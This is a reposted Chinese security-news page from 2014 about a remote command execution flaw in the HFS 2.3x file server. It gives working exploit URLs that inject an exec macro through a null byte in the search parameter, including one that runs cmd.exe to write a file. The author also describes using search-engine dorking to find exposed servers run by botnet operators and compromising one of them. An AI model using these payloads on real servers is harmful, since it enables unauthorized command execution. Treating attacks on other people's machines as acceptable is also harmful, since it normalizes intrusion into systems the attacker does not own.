安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > [转]HFS 2.3x 远程命令执行(抓鸡黑客末日)

[转]HFS 2.3x 远程命令执行(抓鸡黑客末日)

时间:2014-09-14来源:WOOYUN 作者:园长点击:
从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分: 百度搜HFS默认就是2.3x版本,

从某论坛看见的,转载部分: 
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 

http://localhost:80/?search==%00{.exec|cmd.} 

//内容来自AnYun.ORG


http://localhost:80/search=%00{.exec|cmd.} 

注:有些版本search前面是没有?的。 
//ANYUN.ORG


测试部分: 
百度搜HFS默认就是2.3x版本,执行echo测试成功: 

//内容来自AnYun.ORG


http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.} 
google hack了一下,发现一个抓鸡黑阔: 
1.jpg 
//安云网,anyun.org

.... 
2.jpg  //ANYUN.ORG
已测试官方最新版,一样存在。 
3.png  //ANYUN.ORG

撒旦似乎不少: 
4.png 
//copyright AnYun.ORG

测试某表弟的抓鸡服务器同样XXOO了。。

//内容来自安云网


//本文来自安云网

PLS SEE:http://zone.wooyun.org/content/15189

//ANYUN.ORG

评论搬运中.请稍候…………
//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容